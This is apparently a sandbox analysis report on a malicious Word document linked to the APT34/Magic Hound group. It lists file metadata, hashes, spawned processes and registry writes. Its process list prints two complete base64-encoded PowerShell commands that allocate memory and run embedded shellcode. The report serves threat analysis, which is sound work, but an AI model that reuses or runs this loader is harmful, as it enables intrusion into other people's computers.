File name: | MagicHoundAPT34.doc |
Full analysis: | https://app.any.run/tasks/d20920af-e181-4121-b7f3-3f839aeb1ddb |
Verdict: | Malicious activity |
Analysis date: | April 24, 2019, 07:18:23 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Windows User, Template: Normal, Last Saved By: Windows User, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Sun Sep 9 10:44:00 2018, Last Saved Time/Date: Sun Sep 9 10:46:00 2018, Number of Pages: 1, Number of Words: 8, Number of Characters: 47, Security: 0 |
MD5: | 10D12A4363A4CA5CB369EDD4D6DF108E |
SHA1: | 9FF035E1D7517AC3C081A1A25382FA862DD1F87D |
SHA256: | DB53B4157868FFFD0331C1498E2209C11499B14F5AA980FE4FB3453858ED90B5 |
SSDEEP: | 384:wZ8iSUR/8dfErqrbjVSrnQqDhyPuhyWq6r2XhMkfSYwUG2MM2mBS0jUMtPPp:C/qSsbJSzB1SoyWqlRMkHw/M2DTMB |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 15 |
CharCountWithSpaces: | 54 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 47 |
Words: | 8 |
Pages: | 1 |
ModifyDate: | 2018:09:09 09:46:00 |
CreateDate: | 2018:09:09 09:44:00 |
TotalEditTime: | 2.0 minutes |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | Windows User |
Template: | Normal |
Comments: | - |
Keywords: | - |
Author: | Windows User |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2320 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\MagicHoundAPT34.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1184 | powershell.exe -window hidden -e JABHADgAdAAgAD0AIAAnACQAQgBtAHQAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAQgBtAHQAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBhACwAMAB4AGYANwAsADAAeABjADYALAAwAHgANABlACwAMAB4ADAAMwAsADAAeABkADkALAAwAHgAZQBiACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADMAMQAsADAAeAA1ADAALAAwAHgAMQAzACwAMAB4ADAAMwAsADAAeAA1ADAALAAwAHgAMQAzACwAMAB4ADgAMwAsADAAeABlADgALAAwAHgAMABiACwAMAB4ADIANAAsADAAeABiAGIALAAwAHgAZgBmACwAMAB4ADEAYgAsADAAeAAyAGIALAAwAHgANAA0ACwAMAB4ADAAMAAsADAAeABkAGIALAAwAHgANABjACwAMAB4AGMAYwAsADAAeABlADUALAAwAHgAZQBhACwAMAB4ADQAYwAsADAAeABhAGEALAAwAHgANgBlACwAMAB4ADUAYwAsADAAeAA3AGQALAAwAHgAYgA4ACwAMAB4ADIAMwAsADAAeAA1ADAALAAwAHgAZgA2ACwAMAB4AGUAYwAsADAAeABkADcALAAwAHgAZQAzACwAMAB4ADcAYQAsADAAeAAzADkALAAwAHgAZAA3ACwAMAB4ADQANAAsADAAeAAzADAALAAwAHgAMQBmACwAMAB4AGQANgAsADAAeAA1ADUALAAwAHgANgA5ACwAMAB4ADYAMwAsADAAeAA3ADkALAAwAHgAZAA1ACwAMAB4ADcAMAAsADAAeABiADAALAAwAHgANQA5ACwAMAB4AGUANAAsADAAeABiAGEALAAwAHgAYwA1ACwAMAB4ADkAOAAsADAAeAAyADEALAAwAHgAYQA2ACwAMAB4ADIANAAsADAAeABjADgALAAwAHgAZgBhACwAMAB4AGEAYwAsADAAeAA5AGIALAAwAHgAZgBkACwAMAB4ADgAZgAsADAAeABmADkALAAwAHgAMgA3ACwAMAB4ADcANQAsADAAeABjADMALAAwAHgAZQBjACwAMAB4ADIAZgAsADAAeAA2AGEALAAwAHgAOQAzACwAMAB4ADAAZgAsADAAeAAwADEALAAwAHgAMwBkACwAMAB4AGEAOAAsADAAeAA0ADkALAAwAHgAOAAxACwAMAB4AGIAZgAsADAAeAA3AGQALAAwAHgAZQAyACwAMAB4ADgAOAAsADAAeABhADcALAAwAHgANgAyACwAMAB4AGMAZgAsADAAeAA0ADMALAAwAHgANQAzACwAMAB4ADUAMAAsADAAeABiAGIALAAwAHgANQA1ACwAMAB4AGIANQAsADAAeABhADkALAAwAHgANAA0ACwAMAB4AGYAOQAsADAAeABmADgALAAwAHgAMAA2ACwAMAB4AGIANwAsADAAeAAwADMALAAwAHgAMwBjACwAMAB4AGEAMAAsADAAeAAyADgALAAwAHgANwA2ACwAMAB4ADMANAAsADAAeABkADMALAAwAHgAZAA1ACwAMAB4ADgAMQAsADAAeAA4ADMALAAwAHgAYQBlACwAMAB4ADAAMQAsADAAeAAwADcALAAwAHgAMQAwACwAMAB4ADAAOAAsADAAeABjADEALAAwAHgAYgBmACwAMAB4AGYAYwAsADAAeABhADkALAAwAHgAMAA2ACwAMAB4ADUAOQAsADAAeAA3ADYALAAwAHgAYQA1ACwAMAB4AGUAMwAsADAAeAAyAGQALAAwAHgAZAAwACwAMAB4AGEAOQAsADAAeABmADIALAAwAHgAZQAyACwAMAB4ADYAYQAsADAAeABkADUALAAwAHgANwBmACwAMAB4ADAANQAsADAAeABiAGQALAAwAHgANQBjACwAMAB4ADMAYgAsADAAeAAyADIALAAwAHgAMQA5ACwAMAB4ADAANQAsADAAeAA5AGYALAAwAHgANABiACwAMAB4ADMAOAAsADAAeABlADMALAAwAHgANABlACwAMAB4ADcAMwAsADAAeAA1AGEALAAwAHgANABjACwAMAB4ADIAZQAsADAAeABkADEALAAwAHgAMQAwACwAMAB4ADYAMAAsADAAeAAzAGIALAAwAHgANgA4ACwAMAB4ADcAYgAsADAAeABlAGMALAAwAHgAOAA4ACwAMAB4ADQAMQAsADAAeAA4ADQALAAwAHgAZQBjACwAMAB4ADgANgAsADAAeABkADIALAAwAHgAZgA3ACwAMAB4AGQAZQAsADAAeAAwADkALAAwAHgANAA5ACwAMAB4ADkAMAAsADAAeAA1ADIALAAwAHgAYwAxACwAMAB4ADUANwAsADAAeAA2ADcALAAwAHgAOQA1ACwAMAB4AGYAOAAsADAAeAAyADAALAAwAHgAZgA3ACwAMAB4ADYAOAAsADAAeAAwADMALAAwAHgANQAxACwAMAB4AGQAMQAsADAAeABhAGUALAAwAHgANQA3ACwAMAB4ADAAMQAsADAAeAA0ADkALAAwAHgAMAA3ACwAMAB4AGQAOAAsADAAeABjAGEALAAwAHgAOAA5ACwAMAB4AGEAOAAsADAAeAAwAGQALAAwAHgANgA2ACwAMAB4ADgAZgAsADAAeAAzAGUALAAwAHgANgBlACwAMAB4AGQAZgAsADAAeAA4ADUALAAwAHgAYQBjACwAMAB4ADAANgAsADAAeAAyADIALAAwAHgAOQBhACwAMAB4AGMANQAsADAAeAA2ADUALAAwAHgAYQBiACwAMAB4ADcAYwAsADAAeABiADUALAAwAHgAZAA5ACwAMAB4AGYAYwAsADAAeABkADAALAAwAHgANwA1ACwAMAB4ADgAYQAsADAAeABiAGMALAAwAHgAOAAwACwAMAB4ADEAZAAsADAAeABjADAALAAwAHgAMwAyACwAMAB4AGYAZQAsADAAeAAzAGQALAAwAHgAZQBiACwAMAB4ADkAOAAsADAAeAA5ADcALAAwAHgAZAA3ACwAMAB4ADAANAAsADAAeAA3ADUALAAwAHgAYwBmACwAMAB4ADQAZgAsADAAeABiAGMALAAwAHgAZABjACwAMAB4ADkAYgAsADAAeABlAGUALAAwAHgANAAxACwAMAB4AGMAYgAsADAAeABlADEALAAwAHgAMwAwACwAMAB4AGMAOQAsADAAeABmADgALAAwAHgAMQA2ACwAMAB4AGYAZQAsADAAeAAzAGEALAAwAHgANwA0ACwAMAB4ADAANQAsADAAeAA5ADYALAAwAHgAYwBhACwAMAB4AGMAMwAsADAAeAA3ADcALAAwAHgAMwAwACwAMAB4AGQANAAsADAAeABmADkALAAwAHgAMQAyACwAMAB4AGIAYwAsADAAeAA0ADAALAAwAHgAMAA2ACwAMAB4AGIANQAsADAAeABlAGIALAAwAHgAZgBjACwAMAB4ADAANAAsADAAeABlADAALAAwAHgAZABiACwAMAB4AGEAMgAsADAAeABmADcALAAwAHgAYwA3ACwAMAB4ADUAMAAsADAAeAA2AGEALAAwAHgANgAyACwAMAB4AGEAOAAsADAAeAAwAGUALAAwAHgAOQAzACwAMAB4ADYAMgAsADAAeAAyADgALAAwAHgAYwBlACwAMAB4AGMANQAsADAAeABlADgALAAwAHgAMgA4ACwAMAB4AGEANgAsADAAeABiADEALAAwAHgANAA4ACwAMAB4ADcAYgAsADAAeABkADMALAAwAHgAYgBkACwAMAB4ADQANAAsADAAeABlAGYALAAwAHgANAA4ACwAMAB4ADIAOAAsADAAeAA2ADcALAAwAHgANAA2ACwAMAB4ADMAZAAsADAAeABmAGIALAAwAHgAMABmACwAMAB4ADYANAAsADAAeAAxADgALAAwAHgAYwBiACwAMAB4ADgAZgAsADAAeAA5ADcALAAwAHgANABmACwAMAB4AGMAZAAsADAAeABlAGMALAAwAHgANAAxACwAMAB4AGEAOQAsADAAeABiAGIALAAwAHgAMQBjACwAMAB4ADUAMgA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAQwB3AGgAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEMAdwBoAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABDAHcAaAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEcAOAB0ACkAKQA7ACQAQwBIAFMAIAA9ACAAIgAtAGUAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAGsAdwB2AEYAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAawB3AHYARgAgACQAQwBIAFMAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAQwBIAFMAIAAkAGUAIgA7AH0A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1920 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABCAG0AdAAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAEIAbQB0ACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAYQAsADAAeABmADcALAAwAHgAYwA2ACwAMAB4ADQAZQAsADAAeAAwADMALAAwAHgAZAA5ACwAMAB4AGUAYgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQANwAsADAAeAAzADEALAAwAHgANQAwACwAMAB4ADEAMwAsADAAeAAwADMALAAwAHgANQAwACwAMAB4ADEAMwAsADAAeAA4ADMALAAwAHgAZQA4ACwAMAB4ADAAYgAsADAAeAAyADQALAAwAHgAYgBiACwAMAB4AGYAZgAsADAAeAAxAGIALAAwAHgAMgBiACwAMAB4ADQANAAsADAAeAAwADAALAAwAHgAZABiACwAMAB4ADQAYwAsADAAeABjAGMALAAwAHgAZQA1ACwAMAB4AGUAYQAsADAAeAA0AGMALAAwAHgAYQBhACwAMAB4ADYAZQAsADAAeAA1AGMALAAwAHgANwBkACwAMAB4AGIAOAAsADAAeAAyADMALAAwAHgANQAwACwAMAB4AGYANgAsADAAeABlAGMALAAwAHgAZAA3ACwAMAB4AGUAMwAsADAAeAA3AGEALAAwAHgAMwA5ACwAMAB4AGQANwAsADAAeAA0ADQALAAwAHgAMwAwACwAMAB4ADEAZgAsADAAeABkADYALAAwAHgANQA1ACwAMAB4ADYAOQAsADAAeAA2ADMALAAwAHgANwA5ACwAMAB4AGQANQAsADAAeAA3ADAALAAwAHgAYgAwACwAMAB4ADUAOQAsADAAeABlADQALAAwAHgAYgBhACwAMAB4AGMANQAsADAAeAA5ADgALAAwAHgAMgAxACwAMAB4AGEANgAsADAAeAAyADQALAAwAHgAYwA4ACwAMAB4AGYAYQAsADAAeABhAGMALAAwAHgAOQBiACwAMAB4AGYAZAAsADAAeAA4AGYALAAwAHgAZgA5ACwAMAB4ADIANwAsADAAeAA3ADUALAAwAHgAYwAzACwAMAB4AGUAYwAsADAAeAAyAGYALAAwAHgANgBhACwAMAB4ADkAMwAsADAAeAAwAGYALAAwAHgAMAAxACwAMAB4ADMAZAAsADAAeABhADgALAAwAHgANAA5ACwAMAB4ADgAMQAsADAAeABiAGYALAAwAHgANwBkACwAMAB4AGUAMgAsADAAeAA4ADgALAAwAHgAYQA3ACwAMAB4ADYAMgAsADAAeABjAGYALAAwAHgANAAzACwAMAB4ADUAMwAsADAAeAA1ADAALAAwAHgAYgBiACwAMAB4ADUANQAsADAAeABiADUALAAwAHgAYQA5ACwAMAB4ADQANAAsADAAeABmADkALAAwAHgAZgA4ACwAMAB4ADAANgAsADAAeABiADcALAAwAHgAMAAzACwAMAB4ADMAYwAsADAAeABhADAALAAwAHgAMgA4ACwAMAB4ADcANgAsADAAeAAzADQALAAwAHgAZAAzACwAMAB4AGQANQAsADAAeAA4ADEALAAwAHgAOAAzACwAMAB4AGEAZQAsADAAeAAwADEALAAwAHgAMAA3ACwAMAB4ADEAMAAsADAAeAAwADgALAAwAHgAYwAxACwAMAB4AGIAZgAsADAAeABmAGMALAAwAHgAYQA5ACwAMAB4ADAANgAsADAAeAA1ADkALAAwAHgANwA2ACwAMAB4AGEANQAsADAAeABlADMALAAwAHgAMgBkACwAMAB4AGQAMAAsADAAeABhADkALAAwAHgAZgAyACwAMAB4AGUAMgAsADAAeAA2AGEALAAwAHgAZAA1ACwAMAB4ADcAZgAsADAAeAAwADUALAAwAHgAYgBkACwAMAB4ADUAYwAsADAAeAAzAGIALAAwAHgAMgAyACwAMAB4ADEAOQAsADAAeAAwADUALAAwAHgAOQBmACwAMAB4ADQAYgAsADAAeAAzADgALAAwAHgAZQAzACwAMAB4ADQAZQAsADAAeAA3ADMALAAwAHgANQBhACwAMAB4ADQAYwAsADAAeAAyAGUALAAwAHgAZAAxACwAMAB4ADEAMAAsADAAeAA2ADAALAAwAHgAMwBiACwAMAB4ADYAOAAsADAAeAA3AGIALAAwAHgAZQBjACwAMAB4ADgAOAAsADAAeAA0ADEALAAwAHgAOAA0ACwAMAB4AGUAYwAsADAAeAA4ADYALAAwAHgAZAAyACwAMAB4AGYANwAsADAAeABkAGUALAAwAHgAMAA5ACwAMAB4ADQAOQAsADAAeAA5ADAALAAwAHgANQAyACwAMAB4AGMAMQAsADAAeAA1ADcALAAwAHgANgA3ACwAMAB4ADkANQAsADAAeABmADgALAAwAHgAMgAwACwAMAB4AGYANwAsADAAeAA2ADgALAAwAHgAMAAzACwAMAB4ADUAMQAsADAAeABkADEALAAwAHgAYQBlACwAMAB4ADUANwAsADAAeAAwADEALAAwAHgANAA5ACwAMAB4ADAANwAsADAAeABkADgALAAwAHgAYwBhACwAMAB4ADgAOQAsADAAeABhADgALAAwAHgAMABkACwAMAB4ADYANgAsADAAeAA4AGYALAAwAHgAMwBlACwAMAB4ADYAZQAsADAAeABkAGYALAAwAHgAOAA1ACwAMAB4AGEAYwAsADAAeAAwADYALAAwAHgAMgAyACwAMAB4ADkAYQAsADAAeABjADUALAAwAHgANgA1ACwAMAB4AGEAYgAsADAAeAA3AGMALAAwAHgAYgA1ACwAMAB4AGQAOQAsADAAeABmAGMALAAwAHgAZAAwACwAMAB4ADcANQAsADAAeAA4AGEALAAwAHgAYgBjACwAMAB4ADgAMAAsADAAeAAxAGQALAAwAHgAYwAwACwAMAB4ADMAMgAsADAAeABmAGUALAAwAHgAMwBkACwAMAB4AGUAYgAsADAAeAA5ADgALAAwAHgAOQA3ACwAMAB4AGQANwAsADAAeAAwADQALAAwAHgANwA1ACwAMAB4AGMAZgAsADAAeAA0AGYALAAwAHgAYgBjACwAMAB4AGQAYwAsADAAeAA5AGIALAAwAHgAZQBlACwAMAB4ADQAMQAsADAAeABjAGIALAAwAHgAZQAxACwAMAB4ADMAMAAsADAAeABjADkALAAwAHgAZgA4ACwAMAB4ADEANgAsADAAeABmAGUALAAwAHgAMwBhACwAMAB4ADcANAAsADAAeAAwADUALAAwAHgAOQA2ACwAMAB4AGMAYQAsADAAeABjADMALAAwAHgANwA3ACwAMAB4ADMAMAAsADAAeABkADQALAAwAHgAZgA5ACwAMAB4ADEAMgAsADAAeABiAGMALAAwAHgANAAwACwAMAB4ADAANgAsADAAeABiADUALAAwAHgAZQBiACwAMAB4AGYAYwAsADAAeAAwADQALAAwAHgAZQAwACwAMAB4AGQAYgAsADAAeABhADIALAAwAHgAZgA3ACwAMAB4AGMANwAsADAAeAA1ADAALAAwAHgANgBhACwAMAB4ADYAMgAsADAAeABhADgALAAwAHgAMABlACwAMAB4ADkAMwAsADAAeAA2ADIALAAwAHgAMgA4ACwAMAB4AGMAZQAsADAAeABjADUALAAwAHgAZQA4ACwAMAB4ADIAOAAsADAAeABhADYALAAwAHgAYgAxACwAMAB4ADQAOAAsADAAeAA3AGIALAAwAHgAZAAzACwAMAB4AGIAZAAsADAAeAA0ADQALAAwAHgAZQBmACwAMAB4ADQAOAAsADAAeAAyADgALAAwAHgANgA3ACwAMAB4ADQANgAsADAAeAAzAGQALAAwAHgAZgBiACwAMAB4ADAAZgAsADAAeAA2ADQALAAwAHgAMQA4ACwAMAB4AGMAYgAsADAAeAA4AGYALAAwAHgAOQA3ACwAMAB4ADQAZgAsADAAeABjAGQALAAwAHgAZQBjACwAMAB4ADQAMQAsADAAeABhADkALAAwAHgAYgBiACwAMAB4ADEAYwAsADAAeAA1ADIAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEMAdwBoAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABDAHcAaAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAQwB3AGgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1692 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\jfwya5zq.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
2160 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES3A29.tmp" "c:\Users\admin\AppData\Local\Temp\CSC3A28.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) |
(PID) Process: | (2320) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | s)3 |
Value: 7329330010090000010000000000000000000000 | |||
(PID) Process: | (2320) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (2320) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (2320) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | WORDFiles |
Value: 1318584350 | |||
(PID) Process: | (2320) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1318584464 | |||
(PID) Process: | (2320) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1318584465 | |||
(PID) Process: | (2320) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
Operation: | write | Name: | MTTT |
Value: 100900004E2C24F06DFAD40100000000 | |||
(PID) Process: | (2320) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | j+3 |
